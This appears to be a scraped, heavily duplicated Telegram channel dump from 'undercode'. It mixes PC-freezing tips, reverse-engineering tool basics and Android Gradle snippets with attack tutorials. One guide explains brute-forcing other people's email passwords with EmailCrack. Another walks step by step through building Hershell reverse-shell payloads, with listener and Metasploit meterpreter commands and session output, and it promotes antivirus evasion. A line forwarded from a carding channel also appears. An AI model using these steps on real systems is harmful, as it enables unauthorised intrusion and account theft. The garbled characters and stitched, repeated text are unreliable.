β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Reasons and treatment methods of computer "freezing" for no reason by undercode
t.me/UndercodeTesting
1. "Death" caused by improper BIOS settings
Each type of hardware has its own default or specific working environment, and it cannot be set beyond its working authority, otherwise it will crash because the hardware fails to meet this requirement. For example: a memory module can only support DDR 266, but it is set to DDR 333 in the BIOS settings. In this way, it will crash because the hardware cannot meet the requirements. If it can be normal in a short time The electronic components will gradually age with the use of time, and the quality problems will also cause the computer to "freeze" frequently.
2. "Crash" caused by hardware or software conflicts
Computer crashes caused by hardware conflicts are mainly caused by conflicts caused by interrupt settings. When hardware conflicts occur, although the hardware can barely coexist in the system, they cannot work at the same time. For example, when you can access the Internet, you cannot listen. Music and so on. Over time, interrupted conflicts will appear frequently, and eventually the system will be overwhelmed and cause "crash".
The same is true of software. As more and more software is developed by different software companies, and these softwares cannot be fully familiar with and cooperate with each other during the development process, therefore, when running these software together, it is easy for everyone to happen At the same time, the same DLL or the same physical address is called, so a conflict occurs. The computer system at this time did not know which request should be processed first, which caused a system disorder and caused the computer to "halt".
3. "Crash" caused by hardware quality and failure
At present, some small-brand computer hardware products are often put on the market without a qualified inspection procedure. Among them, many hardware products of unqualified quality are very concealed under the hood of intact computer hardware, which is not easy for ordinary people to see. of. As far as these hardware products are concerned, the reason why computers often "freeze" has a very direct relationship with them. In addition, some hardware failures are caused by the use of too long. In general, the life of components such as memory modules, CPUs, and hard drives is difficult to guarantee after more than three years, which can also cause many hidden "death" problems.
4. "Death" caused by exhaustion of computer system source
When the computer system executes the wrong program or code, it will form a "dead" cycle inside the system. The originally very limited system resources will be invested in endless repetitive operations. When the operation ends, it will be because of the computer. Too large will exhaust resources and cause a "crash". Another point is that a large number of programs are running in the computer operating system, making the system's memory resources insufficient and causing "death".
5. "Death" caused by damage to system files
System files mainly refer to the files that are critically supported when the computer system is started or run. If they are missing, the entire computer system will not function properly. Of course, "death" is inevitable. There are many reasons for the destruction of system files, and the invasion of viruses and hacker programs is the main reason. In addition, due to wrong operation, novice users delete the system files will also cause such consequences.
6. "Crash" caused by poor heat dissipation inside the computer
Because the main component of the electronic components inside the computer is silicon (this is an element whose working state is greatly affected by temperature). When the computer is working, the temperature of electronic components will increase accordingly, and the phenomenon of electron migration will occur on the surface, thereby changing the current working state, causing the computer to suddenly "freeze" during work.
π¦ Reasons and treatment methods of computer "freezing" for no reason by undercode
t.me/UndercodeTesting
1. "Death" caused by improper BIOS settings
Each type of hardware has its own default or specific working environment, and it cannot be set beyond its working authority, otherwise it will crash because the hardware fails to meet this requirement. For example: a memory module can only support DDR 266, but it is set to DDR 333 in the BIOS settings. In this way, it will crash because the hardware cannot meet the requirements. If it can be normal in a short time The electronic components will gradually age with the use of time, and the quality problems will also cause the computer to "freeze" frequently.
2. "Crash" caused by hardware or software conflicts
Computer crashes caused by hardware conflicts are mainly caused by conflicts caused by interrupt settings. When hardware conflicts occur, although the hardware can barely coexist in the system, they cannot work at the same time. For example, when you can access the Internet, you cannot listen. Music and so on. Over time, interrupted conflicts will appear frequently, and eventually the system will be overwhelmed and cause "crash".
The same is true of software. As more and more software is developed by different software companies, and these softwares cannot be fully familiar with and cooperate with each other during the development process, therefore, when running these software together, it is easy for everyone to happen At the same time, the same DLL or the same physical address is called, so a conflict occurs. The computer system at this time did not know which request should be processed first, which caused a system disorder and caused the computer to "halt".
3. "Crash" caused by hardware quality and failure
At present, some small-brand computer hardware products are often put on the market without a qualified inspection procedure. Among them, many hardware products of unqualified quality are very concealed under the hood of intact computer hardware, which is not easy for ordinary people to see. of. As far as these hardware products are concerned, the reason why computers often "freeze" has a very direct relationship with them. In addition, some hardware failures are caused by the use of too long. In general, the life of components such as memory modules, CPUs, and hard drives is difficult to guarantee after more than three years, which can also cause many hidden "death" problems.
4. "Death" caused by exhaustion of computer system source
When the computer system executes the wrong program or code, it will form a "dead" cycle inside the system. The originally very limited system resources will be invested in endless repetitive operations. When the operation ends, it will be because of the computer. Too large will exhaust resources and cause a "crash". Another point is that a large number of programs are running in the computer operating system, making the system's memory resources insufficient and causing "death".
5. "Death" caused by damage to system files
System files mainly refer to the files that are critically supported when the computer system is started or run. If they are missing, the entire computer system will not function properly. Of course, "death" is inevitable. There are many reasons for the destruction of system files, and the invasion of viruses and hacker programs is the main reason. In addition, due to wrong operation, novice users delete the system files will also cause such consequences.
6. "Crash" caused by poor heat dissipation inside the computer
Because the main component of the electronic components inside the computer is silicon (this is an element whose working state is greatly affected by temperature). When the computer is working, the temperature of electronic components will increase accordingly, and the phenomenon of electron migration will occur on the surface, thereby changing the current working state, causing the computer to suddenly "freeze" during work.
7. "Crash" caused by novice user's wrong operation
For novice users, some wrong operations in the process of using the computer will also cause the system to "freeze". For example, hot-plugging hardware, shaking the computer during operation, deleting files at random, or installing software that exceeds the basic hardware setting standards, etc. can cause a "death".
8. "Crash" caused by other aspects
In addition to the reasons described by the author above, there are many strange reasons that may cause the system to "freeze". For example, the voltage fluctuation is too large, the CD-ROM reading ability of the optical drive is reduced, the quality of the floppy disk is poor, and the virus or hacker program is damaged. In short, there are many reasons for the computer crash.
As can be seen from the above points, computer "death" is not a good thing for the average user, but it is not inevitable. As long as the user operates according to the normal computer, the probability of "death" will be reduced to a minimum. Below, I will introduce some of the experiences I have summarized on the reasons for the computer crash.
Second, the prevention of computer "crash"
1. Ensure correct Bios settings. The settings in Bios must be appropriate. Incorrect Bios settings can cause you to freeze when running Windows.
2. Check the contact of computer accessories frequently. Running with poor card contact will cause the system to crash, so when replacing computer accessories, be sure to allow the card to fully contact the motherboard.
3. Clean the case regularly. Too much dust will cause poor contact between the boards and cause the system to freeze during operation. Therefore, the chassis should be cleaned at any time, and do not allow too much dust to accumulate in the chassis.
4. Insist on serious virus detection. Do not use CDs or floppy disks of unknown origin easily, and check attachments in emails with antivirus software before opening.
5. Shut down in the correct order of operations. Do not turn off the power before the application software ends normally, otherwise system files will be damaged or lost, causing crashes during startup or operation.
6. Avoid multitasking at the same time. Do not run other software while performing disk defragmentation or checking the hard disk with anti-virus software, otherwise it will cause a crash.
7. Don't be overly innovative. Drivers of various hardware do not have to be updated at any time, because the drivers that were developed often have bugs in them, which will cause damage to the system and cause system crashes. The latest ones are not necessarily the best.
8. When uninstalling the software, use the built-in anti-installation program or the installation / uninstallation method in Windows. Do not delete the program folder directly, because some files may be shared by other programs. Once these shared files are deleted, the application software will be unusable. And the crash.
9. When setting up a hardware device, it is best to check for the reserved interrupt (IRQ). Do not allow other devices to use the interrupt number to avoid interrupt conflicts and system crashes.
10. When surfing the Internet, do not open too many browser windows, otherwise it will cause insufficient system resources and cause the system to freeze.
11. If your machine's memory is not very large, don't run programs that take up more memory, such as Photoshop, otherwise it will easily crash when running.
12. For system files or important files, it is best to use implicit attributes, so as not to delete these files due to wrong operations, causing system crashes.
13. When modifying the master boot record of the hard disk, it is best to save the original record first to prevent the original boot record from being unable to be restored due to the modification failure.
For novice users, some wrong operations in the process of using the computer will also cause the system to "freeze". For example, hot-plugging hardware, shaking the computer during operation, deleting files at random, or installing software that exceeds the basic hardware setting standards, etc. can cause a "death".
8. "Crash" caused by other aspects
In addition to the reasons described by the author above, there are many strange reasons that may cause the system to "freeze". For example, the voltage fluctuation is too large, the CD-ROM reading ability of the optical drive is reduced, the quality of the floppy disk is poor, and the virus or hacker program is damaged. In short, there are many reasons for the computer crash.
As can be seen from the above points, computer "death" is not a good thing for the average user, but it is not inevitable. As long as the user operates according to the normal computer, the probability of "death" will be reduced to a minimum. Below, I will introduce some of the experiences I have summarized on the reasons for the computer crash.
Second, the prevention of computer "crash"
1. Ensure correct Bios settings. The settings in Bios must be appropriate. Incorrect Bios settings can cause you to freeze when running Windows.
2. Check the contact of computer accessories frequently. Running with poor card contact will cause the system to crash, so when replacing computer accessories, be sure to allow the card to fully contact the motherboard.
3. Clean the case regularly. Too much dust will cause poor contact between the boards and cause the system to freeze during operation. Therefore, the chassis should be cleaned at any time, and do not allow too much dust to accumulate in the chassis.
4. Insist on serious virus detection. Do not use CDs or floppy disks of unknown origin easily, and check attachments in emails with antivirus software before opening.
5. Shut down in the correct order of operations. Do not turn off the power before the application software ends normally, otherwise system files will be damaged or lost, causing crashes during startup or operation.
6. Avoid multitasking at the same time. Do not run other software while performing disk defragmentation or checking the hard disk with anti-virus software, otherwise it will cause a crash.
7. Don't be overly innovative. Drivers of various hardware do not have to be updated at any time, because the drivers that were developed often have bugs in them, which will cause damage to the system and cause system crashes. The latest ones are not necessarily the best.
8. When uninstalling the software, use the built-in anti-installation program or the installation / uninstallation method in Windows. Do not delete the program folder directly, because some files may be shared by other programs. Once these shared files are deleted, the application software will be unusable. And the crash.
9. When setting up a hardware device, it is best to check for the reserved interrupt (IRQ). Do not allow other devices to use the interrupt number to avoid interrupt conflicts and system crashes.
10. When surfing the Internet, do not open too many browser windows, otherwise it will cause insufficient system resources and cause the system to freeze.
11. If your machine's memory is not very large, don't run programs that take up more memory, such as Photoshop, otherwise it will easily crash when running.
12. For system files or important files, it is best to use implicit attributes, so as not to delete these files due to wrong operations, causing system crashes.
13. When modifying the master boot record of the hard disk, it is best to save the original record first to prevent the original boot record from being unable to be restored due to the modification failure.
14. CPU, graphics card and other accessories are generally not overclocked. If you do need to overclock, pay attention to the temperature of the card after overclocking. CPU and graphics card will automatically restart or crash if they work under abnormal frequency and temperature for a long time. Motherboard.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to use EmailCrack to crack email password
Now when you go to an ISP to open an account, they will usually give you an email address. The address is usually your account @ xxx.net. The password is the same as your internet password. Too.
In this case, run those password cracking software, such as EmailCrack or Internet Assassin, and slowly wait with the dictionary file. Generally, it needs to be cracked for dozens of hours.
This software must be used in a connected state and is suitable for obtaining passwords of users with mailboxes. The premise is that you must have an account for the target host.
EmailCrack is an automatic login machine based on the POP3 protocol. It can use the functions of the POP3 protocol to conduct login tests on possible user passwords to obtain user passwords.
The operation method is very simple, let the hacker team try!
1. First dial-up Internet access, after connecting to the Internet, run EmailCrack, the main interface appears. In the "server address" (server address) input box, enter the host address to be connected, generally enter the POP3 server address, of course, you can also enter the IP address and domain name address (after experiments, the fastest connection speed by entering the IP address ).
2. In the "user list file" (user name list file) input box, directly enter the drive letter, path and file name of the user list file, or click the "user list file" button with the mouse in the "Open" dialog box Double-click directly on the file to be selected.
3. Enter the drive letter, path and file name of the password list file directly in the "password list file" input box, or click the "password list file" button with the mouse in the "Open" dialog Double-click directly on the file to be selected.
Please note here: The format of the user list file is an ordinary text format, which requires one user per line. It cannot be used directly with the passwd file pulled from the host. You must use other information in the passwd file after removing it.
4. The "Try User name" multiple option allows you to decide whether the program uses the user's account as the password to log in.
5. In the "Thread Number" text input box, you can enter the number of threads that the program opens simultaneously.
6. After everything is set, click the "Begin" button with the mouse, the program will automatically test each account with the password in the password list. If successful, the program will display the user name in the result box, where "Search" is The number of tried, "Get" is the number of passwords, the results will be automatically saved in the file Result.txt.
EmailCrack is actually just a password cracking software that performs mechanical tests according to input parameters. However, this method is effective for users with usernames or simple numbers and letters as passwords
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to use EmailCrack to crack email password
Now when you go to an ISP to open an account, they will usually give you an email address. The address is usually your account @ xxx.net. The password is the same as your internet password. Too.
In this case, run those password cracking software, such as EmailCrack or Internet Assassin, and slowly wait with the dictionary file. Generally, it needs to be cracked for dozens of hours.
This software must be used in a connected state and is suitable for obtaining passwords of users with mailboxes. The premise is that you must have an account for the target host.
EmailCrack is an automatic login machine based on the POP3 protocol. It can use the functions of the POP3 protocol to conduct login tests on possible user passwords to obtain user passwords.
The operation method is very simple, let the hacker team try!
1. First dial-up Internet access, after connecting to the Internet, run EmailCrack, the main interface appears. In the "server address" (server address) input box, enter the host address to be connected, generally enter the POP3 server address, of course, you can also enter the IP address and domain name address (after experiments, the fastest connection speed by entering the IP address ).
2. In the "user list file" (user name list file) input box, directly enter the drive letter, path and file name of the user list file, or click the "user list file" button with the mouse in the "Open" dialog box Double-click directly on the file to be selected.
3. Enter the drive letter, path and file name of the password list file directly in the "password list file" input box, or click the "password list file" button with the mouse in the "Open" dialog Double-click directly on the file to be selected.
Please note here: The format of the user list file is an ordinary text format, which requires one user per line. It cannot be used directly with the passwd file pulled from the host. You must use other information in the passwd file after removing it.
4. The "Try User name" multiple option allows you to decide whether the program uses the user's account as the password to log in.
5. In the "Thread Number" text input box, you can enter the number of threads that the program opens simultaneously.
6. After everything is set, click the "Begin" button with the mouse, the program will automatically test each account with the password in the password list. If successful, the program will display the user name in the result box, where "Search" is The number of tried, "Get" is the number of passwords, the results will be automatically saved in the file Result.txt.
EmailCrack is actually just a password cracking software that performs mechanical tests according to input parameters. However, this method is effective for users with usernames or simple numbers and letters as passwords
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦REVERSE ENGENEER FOR BEGINERS Reverse engineering :
> tools
T.me/UndercodeTesting
The process of reverse engineering involves using certain tools which consist of:
π¦ππΌπ'π πππΈβπ :
1) Disassemblers. Disassemblers are used to disect binary codes into assembly codes. They are also employed in extracting strings, functions (both imported and exported), libraries, etc. they help to convert the machine language into a more user-friendly format. Different disassemblers are used for various purposes.
2) Debuggers. Debuggers contribute to expanding the functionality of disassemblers by supporting the CPU registers, hex dumping of programs, view of the stack, among other things. Programmers use debuggers to set breakpoints as well as edit assembly codes at run time. They are used in analyzing binaries the same way disassemblers are. Also, they let the reverser step through the code by running a line at a time so as to investigate the results.
3) Hex Editors. Hex editors allow programmers to view and edit binaries according to software requirements. They help make it possible to manipulate the fundamental binary data that makes up a computer file. Moreover, because they are used to edit binary files, they are sometimes referred to as a binary editor or a binary file editor.
4) PE and Resource Viewer. This tool allows programmers to view and edit resources that are embedded in the EXE file. They let them change icons, edit menu, version information, dialog, etc. PE Explorer makes it easy to translate applications that do not have source codes. All that you need to do is replace text resources with their translated versions, then resize buttons, forms, etc.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦REVERSE ENGENEER FOR BEGINERS Reverse engineering :
> tools
T.me/UndercodeTesting
The process of reverse engineering involves using certain tools which consist of:
π¦ππΌπ'π πππΈβπ :
1) Disassemblers. Disassemblers are used to disect binary codes into assembly codes. They are also employed in extracting strings, functions (both imported and exported), libraries, etc. they help to convert the machine language into a more user-friendly format. Different disassemblers are used for various purposes.
2) Debuggers. Debuggers contribute to expanding the functionality of disassemblers by supporting the CPU registers, hex dumping of programs, view of the stack, among other things. Programmers use debuggers to set breakpoints as well as edit assembly codes at run time. They are used in analyzing binaries the same way disassemblers are. Also, they let the reverser step through the code by running a line at a time so as to investigate the results.
3) Hex Editors. Hex editors allow programmers to view and edit binaries according to software requirements. They help make it possible to manipulate the fundamental binary data that makes up a computer file. Moreover, because they are used to edit binary files, they are sometimes referred to as a binary editor or a binary file editor.
4) PE and Resource Viewer. This tool allows programmers to view and edit resources that are embedded in the EXE file. They let them change icons, edit menu, version information, dialog, etc. PE Explorer makes it easy to translate applications that do not have source codes. All that you need to do is replace text resources with their translated versions, then resize buttons, forms, etc.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦REVERSE SHELL GENERATOR TUTORIAL BY UNDERCODE :
t.me/UndercodeTesting
π¦ππΌπ'π πππΈβπ :
The current version of Hershell supports the following operating systems:
Windows
Linux
macOS
FreeBSD
Development purpose
π¦ Although Meterpreter Payload can sometimes be used, antivirus products can easily detect this method. Therefore, Hershell came into being, it can provide us with TCP-based reverse Shell, and can support a variety of different operating system platforms.
Tools use related components
Hershell was developed using Go language. First, we need to complete the Go environment settings on the device according to the Go official manual, and then set the $ GOPATH environment variable.
Next, run the following command to obtain the project source code:
go get github.com/lesnuages/hershell
Build payload
When building the payload, we can choose to use the provided Makefile to complete the build. At this point, we need to set the following environment variables:
GOOS: target operating system
GOARCH: target architecture
LHOST: attacker IP or host domain name
LPORT: listener port
Of course, we also provide some variable values in the Makefile for reference:
depends: Generate server certificate (required for reverse shell)
Windows32: Generate 32-bit Windows executable file (PE 32-bit)
Windows64: Build 64-bit Windows executable file (PE 64-bit)
linux32: build a 32-bit Linux executable file (ELF 32-bit)
linux64: build 64-bit Linux executable files (ELF 64-bit)
macos32: build a 32-bit macOS executable file (Mach-O)
macos64: build a 64-bit macOS executable file (Mach-O)
For the target platform in the above list, we also need to set two environment variables LHOST and LPORT.
π¦ Use reverse Shell
After the code starts executing, the tool will provide us with a remote shell, which is a custom interactive shell that allows us to execute system commands through cmd.exe on Windows or / bin / sh on Unix devices.
The following table shows some specific commands supported by Hershell:
run_shell: Get the system shell
inject <base64 shellcode>: Inject shellcode (Base64 encoding) into the same process memory and execute the code.
meterpreter [tcp | http | https: IP: PORT: establish a connection with multiple processors, and obtain the second stage reverse TCP, HTTP or HTTPS meter from Metasploit, and then execute Shellcode in memory (this function is currently only supported on Windows platform).
exit: Exit the program
Tool use
π¦ First, we need to use the following command to generate a valid certificate:
$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
For Windows platforms:
# Predifined 32 bit target
$ make windows32 LHOST = 192.168.0.12 LPORT = 1234
# Predifined 64 bit target
$ make windows64 LHOST = 192.168.0.12 LPORT = 1234
For Linux platforms:
# Predifined 32 bit target
$ make linux32 LHOST = 192.168.0.12 LPORT = 1234
# Predifined 64 bit target
$ make linux64 LHOST = 192.168.0.12 LPORT = 1234
For macOS platform:
$ make macos LHOST = 192.168.0.12 LPORT = 1234
π¦Tool usage examples
Basic use
We can use various tools to handle incoming connections, for example:
shocked
ncat
openssl server module
π¦Various handlers of Metasploit (python / shell_reverse_tcp_ssl payload)
The following is an example using ncat:
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab
π¦REVERSE SHELL GENERATOR TUTORIAL BY UNDERCODE :
t.me/UndercodeTesting
π¦ππΌπ'π πππΈβπ :
The current version of Hershell supports the following operating systems:
Windows
Linux
macOS
FreeBSD
Development purpose
π¦ Although Meterpreter Payload can sometimes be used, antivirus products can easily detect this method. Therefore, Hershell came into being, it can provide us with TCP-based reverse Shell, and can support a variety of different operating system platforms.
Tools use related components
Hershell was developed using Go language. First, we need to complete the Go environment settings on the device according to the Go official manual, and then set the $ GOPATH environment variable.
Next, run the following command to obtain the project source code:
go get github.com/lesnuages/hershell
Build payload
When building the payload, we can choose to use the provided Makefile to complete the build. At this point, we need to set the following environment variables:
GOOS: target operating system
GOARCH: target architecture
LHOST: attacker IP or host domain name
LPORT: listener port
Of course, we also provide some variable values in the Makefile for reference:
depends: Generate server certificate (required for reverse shell)
Windows32: Generate 32-bit Windows executable file (PE 32-bit)
Windows64: Build 64-bit Windows executable file (PE 64-bit)
linux32: build a 32-bit Linux executable file (ELF 32-bit)
linux64: build 64-bit Linux executable files (ELF 64-bit)
macos32: build a 32-bit macOS executable file (Mach-O)
macos64: build a 64-bit macOS executable file (Mach-O)
For the target platform in the above list, we also need to set two environment variables LHOST and LPORT.
π¦ Use reverse Shell
After the code starts executing, the tool will provide us with a remote shell, which is a custom interactive shell that allows us to execute system commands through cmd.exe on Windows or / bin / sh on Unix devices.
The following table shows some specific commands supported by Hershell:
run_shell: Get the system shell
inject <base64 shellcode>: Inject shellcode (Base64 encoding) into the same process memory and execute the code.
meterpreter [tcp | http | https: IP: PORT: establish a connection with multiple processors, and obtain the second stage reverse TCP, HTTP or HTTPS meter from Metasploit, and then execute Shellcode in memory (this function is currently only supported on Windows platform).
exit: Exit the program
Tool use
π¦ First, we need to use the following command to generate a valid certificate:
$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
For Windows platforms:
# Predifined 32 bit target
$ make windows32 LHOST = 192.168.0.12 LPORT = 1234
# Predifined 64 bit target
$ make windows64 LHOST = 192.168.0.12 LPORT = 1234
For Linux platforms:
# Predifined 32 bit target
$ make linux32 LHOST = 192.168.0.12 LPORT = 1234
# Predifined 64 bit target
$ make linux64 LHOST = 192.168.0.12 LPORT = 1234
For macOS platform:
$ make macos LHOST = 192.168.0.12 LPORT = 1234
π¦Tool usage examples
Basic use
We can use various tools to handle incoming connections, for example:
shocked
ncat
openssl server module
π¦Various handlers of Metasploit (python / shell_reverse_tcp_ssl payload)
The following is an example using ncat:
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab
Meterpreter scene
Note: Currently only Windows platform supports this feature.
π¦ The Meterpreter usage of this tool currently only supports the following loads:
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
windows/x64/meterpreter/reverse_http
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
π¦When you choose to use a certain payload, don't forget to choose the correct transmission port (tcp, http or https).
MeterpreterHandler uses the following example:
[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
π¦Exploit running as background job 0.
[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
Next, in hershell, use the meterpreter command:
[hershell]> meterpreter https 172.16.122.105:8443
At this point, we will be able to get a new Meterpreter session in msfconsole:
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100
[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions
π¦Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)
[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meter preter> indicated
Server username: DESKTOP-3PVV31A\lab
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Note: Currently only Windows platform supports this feature.
π¦ The Meterpreter usage of this tool currently only supports the following loads:
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
windows/x64/meterpreter/reverse_http
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
π¦When you choose to use a certain payload, don't forget to choose the correct transmission port (tcp, http or https).
MeterpreterHandler uses the following example:
[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
π¦Exploit running as background job 0.
[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
Next, in hershell, use the meterpreter command:
[hershell]> meterpreter https 172.16.122.105:8443
At this point, we will be able to get a new Meterpreter session in msfconsole:
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100
[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions
π¦Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)
[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meter preter> indicated
Server username: DESKTOP-3PVV31A\lab
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦reverse hacking full by undercode
> Hershell: Cross-platform reverse shell generator
> Hershell: Cross-platform reverse shell generator
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Optimize your build configuration
t.me/UndercodeTesting
π¦ Follow these tips to improve the build speed of your Android Studio project.
1) Keep your tools up-to-date
2) The Android tools receive build optimizations and new features with almost every update, and some tips on this page assume you're using the latest version. To take advantage of the latest optimizations, keep the following up to date:
π¦ Android Studio and SDK tools
> The Android plugin for Gradle
> Create a build variant for development
> Many of the configurations you need when preparing your app for
release are not required while developing your app. Enabling unnecessary build processes slows down your incremental and clean builds, so configure a build variant that keeps only the build configurations you need while developing your app. The following sample creates a "dev" flavor and a "prod" flavor (for your release version configurations):
π¦android {
...
defaultConfig {...}
buildTypes {...}
productFlavors {
// When building a variant that uses this flavor, the following configurations
// override those in the defaultConfig block.
dev {
// To avoid using legacy multidex when building from the command line,
// set minSdkVersion to 21 or higher. When using Android Studio 2.3 or higher,
// the build automatically avoids legacy multidex when deploying to a device running
// API level 21 or higherβregardless of what you set as your minSdkVersion.
minSdkVersion 21
versionNameSuffix "-dev"
applicationIdSuffix '.dev'
}
prod {
// If you've configured the defaultConfig block for the release version of
// your app, you can leave this block empty and Gradle uses configurations in
// the defaultConfig block instead. You still need to create this flavor.
// Otherwise, all variants use the "dev" flavor configurations.
}
}
}
3) If your build configuration already uses product flavors to create different versions of your app, you can combine the "dev" and "prod" configurations with those flavors by using flavor dimensions. For example, if you already configure a "demo" and "full" flavor, you can use the following sample configuration to create combined flavors, such as "devDemo" and "prodFull":
android {
...
defaultConfig {...}
buildTypes {...}
// Specifies the flavor dimensions you want to use. The order in which you
// list each dimension determines its priority, from highest to lowest,
// when Gradle merges variant sources and configurations. You must assign
// each product flavor you configure to one of the flavor dimensions.
flavorDimensions "stage", "mode"
productFlavors {
dev {
dimension "stage"
minSdkVersion 21
versionNameSuffix "-dev"
applicationIdSuffix '.dev'
...
}
prod {
dimension "stage"
...
}
demo {
dimension "mode"
...
}
full {
dimension "mode"
...
}
}
}
π¦ Optimize your build configuration
t.me/UndercodeTesting
π¦ Follow these tips to improve the build speed of your Android Studio project.
1) Keep your tools up-to-date
2) The Android tools receive build optimizations and new features with almost every update, and some tips on this page assume you're using the latest version. To take advantage of the latest optimizations, keep the following up to date:
π¦ Android Studio and SDK tools
> The Android plugin for Gradle
> Create a build variant for development
> Many of the configurations you need when preparing your app for
release are not required while developing your app. Enabling unnecessary build processes slows down your incremental and clean builds, so configure a build variant that keeps only the build configurations you need while developing your app. The following sample creates a "dev" flavor and a "prod" flavor (for your release version configurations):
π¦android {
...
defaultConfig {...}
buildTypes {...}
productFlavors {
// When building a variant that uses this flavor, the following configurations
// override those in the defaultConfig block.
dev {
// To avoid using legacy multidex when building from the command line,
// set minSdkVersion to 21 or higher. When using Android Studio 2.3 or higher,
// the build automatically avoids legacy multidex when deploying to a device running
// API level 21 or higherβregardless of what you set as your minSdkVersion.
minSdkVersion 21
versionNameSuffix "-dev"
applicationIdSuffix '.dev'
}
prod {
// If you've configured the defaultConfig block for the release version of
// your app, you can leave this block empty and Gradle uses configurations in
// the defaultConfig block instead. You still need to create this flavor.
// Otherwise, all variants use the "dev" flavor configurations.
}
}
}
